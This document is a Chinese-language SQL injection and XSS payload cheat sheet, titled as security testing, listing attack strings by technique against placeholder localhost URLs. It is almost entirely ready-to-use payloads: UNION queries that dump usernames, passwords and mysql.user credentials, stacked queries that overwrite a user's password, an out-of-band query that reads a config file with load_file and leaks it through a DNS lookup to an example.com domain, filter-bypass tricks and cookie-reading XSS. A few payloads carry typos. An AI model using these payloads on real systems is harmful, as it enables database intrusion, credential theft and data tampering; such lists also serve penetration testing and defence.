注入防范-安全测试
SQL注入
-
示例
select * from <表名> where id = x and 1=1
select * from <表名> where id = 'x' and '1'='1
select id,name from test where id=1 or 1=1
select * from table where name='2''
select * from tables where title like '%
http://127.0.0.1/XXX.php?title=t' and '1'='1' -- &action=search
-
SQL注入之Get注入
http://127.0.0.1/XXX.php?title='union select 1,2,3,4,5,6,7 from INFORMATION_SCHEMA.tables --'&action=search
http://127.0.0.1/XXX.php?title='union select 1, user(), database(), table_name,version(),6,7 from INFORMATION_SCHEMA.tables where table_schema=database() -- '&action=search
http://127.0.0.1/XXX.php?title='union select 1, column_name,3,4,5,6,7 from INFORMATION_SCHEMA.columns where table_name = 'users' -- '&action=search
http://127.0.0.1/XXX.php?title='union select 1, login,password,4,5,6,7 from users -- '&action=search
-
SQL注入之Post注入
报文内容参数直接加'
报文内容参数直接加union :
union select 1,2 from INFORMATION_SCHKMA.tables -- &action=go
union select 1,2,3,4,5,6,7 from INFORMATION_SCHKMA.tables -- &action=go
union select user(), user(), database(),table_name,version(),user(),user() from INFORMATION_SCHEMA.tables-- &action=go
-
SQL注入之Http头注入
报文头之User-Agent内容改为123' #
-
SQL注入之布尔类型注入
http://test.com/XXX?id=1 and substring(version(),1,1)=5
-
SQL注入之可联合查询类型注入
http://test.com/XXX?id=1 UNION ALL SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA
-
SQL注入之时间延迟判断类型注入
select * from user where id= '4' and sleep(3)
http://127.0.0.1/XXX.php?id=1234' and length(database())=4 and sleep(3) -- &action=search
http://127.0.0.1/XXX.php?id=1234' and substr(database(),1,1)=‘a' and sleep(3) -- &action=search
http://127.0.0.1/XXX.php?id=1234' and length(version())=5 and sleep(3) -- &action=search
http://127.0.0.1/XXX.php?id=1234' and ascii(substr(database(),1,1))=98 and sleep(3) -- &action=search,其中98对应ASCII表
-
SQL注入之报错类型注入
select floor(0.1),floor(0.51),floor(0.99)
select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a;
select rand() from information_schema.tables limit 0.10
select count(*),concat((select user()),floor(rand(0)*2))x from test group by x
select extractvalue('<a><b>test</b></a>','~wrong')
select extractvalue('<a><b>test</b></a>',(select @@version))
select extractvalue('<a><b>test</b></a>',concat((0x7e,select @@version))) 其中0x7e代表通信标识符~
http://127.0.0.1/XXX.php?id=1' and extractvalue(1, concat(0x7e, (select @@version))) -- '
http://127.0.0.1/XXX/?id=1' and extractvalue(1,concat(0x7e, (select @@version))) -- '&Submit=Submit#
http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select user()),0x7e,(select database()))) -- '&Submit=Submit#
http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema="xxx" limit 0,1))) -- '&Submit=Submit#
http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema=' xxx ' limit 1,1))) -- '&Submit=Submit#
http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_schema="users" limit 3,1))) –
http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e, (select concat_ws(':',user,password) from xxx.users limit 0,1))) -- '&Submit=Submit#
select updateXML('<a><b>test</b></a>','/a/b'.'updateXMLtest')
http://127.0.0.1/XXX/?id=2' and updatexml(1,concat(0x7e,(SELECT @@version)),1) -- '
select exp(~(select * from(select database())x))
select exp(~(select * from (select user())x));
select extractivalue(1,mid(concat(0x7e, (select concat_ws(':',user,password) from dvwa.users limit 0,1) ),1,29))
-
SQL注入之多语句查询注入(危险)
http://127.0.0.1/XXX/?id=1;update t set name = 'a' where id=1
-
SQL注入之OOD注入
select concat(to_base64(substr(load_file("C: \\MySQL5.7.26\\my.ini"),1,15)),".example.com") as result;
select UTL_HTTP.request('http:// 127.0.0.1/test123.php'||'?id='||(select version from v$instance)) from dual
-
SQL注入之堆叠注入(危险)
http://127.0.0.1/xxx/?id=1'; update users set password=e10adc3949ba59abbe56e057f20f883e' where user_id=1; - - &Submit=Submit#
-
SQL注入之预处理参数化查询
?id=1 and 1=1
?id=1’ and 1=1 --+
?id=1%df’ and 1=1 --+
-
SQL注入之绕过策略
1 || 1 = 1 1 && 1 = 1
1 || (select user from users where user_id = 1)= 'admin'
select * from test where id =1 || (select count(*) from test)>0
1 || (select user from users limit 1,1)= 'admin'
1 || (select min(user) from group by user_id having user_id)
1 || select substr((select group_concat(name)name from test),1, 1) = 't'
1 || substr(name, 1, 1)=unhex(74)
1 || substr(name, 1, 1)=0x74
1/**/||/**/binary(name)/**/=/**/0x74657374
select/**/name/**/from/**/test/**/where/**/id/**/like/**/1
http://127.0.0.1/XXX/?id=133 %df%27 union select 1,user(),3 %23
-
SQL注入之命令执行类型
http://127.0.0.1/XXX.php?id=12 union select 1,2,Host,User,Password,6,7 from mysql.user limit 4,1 &action=go
http://127.0.0.1/XXX.php?id=12 union select 1,2,@@basedir,@@@version,5,6,7 from mysql.user limit 0,1 &action=go
XSS注入
-
示例
<script>alert(1)</script>
<script>alert("点击此处修复");location.href="https://www.baidu.com"</script>
<script>alert(document.cookie)</script>
<img src="a.png" onerror=alert(1)>
<img src=x onerror=alert("xss")>
<script>alert'xss'</script>
<script>alert(/xss/)</script>
<img src=x onerror=alert("xss")>
-
XSS漏洞之模板注入
请求报头第一行等号后面参数改为%0a%3dglobal
请求报头第一行等号后面参数改为%0a%3d8*8
请求报头第一行等号后面参数改为8*8
友链:五号黯区https://www.dark5.net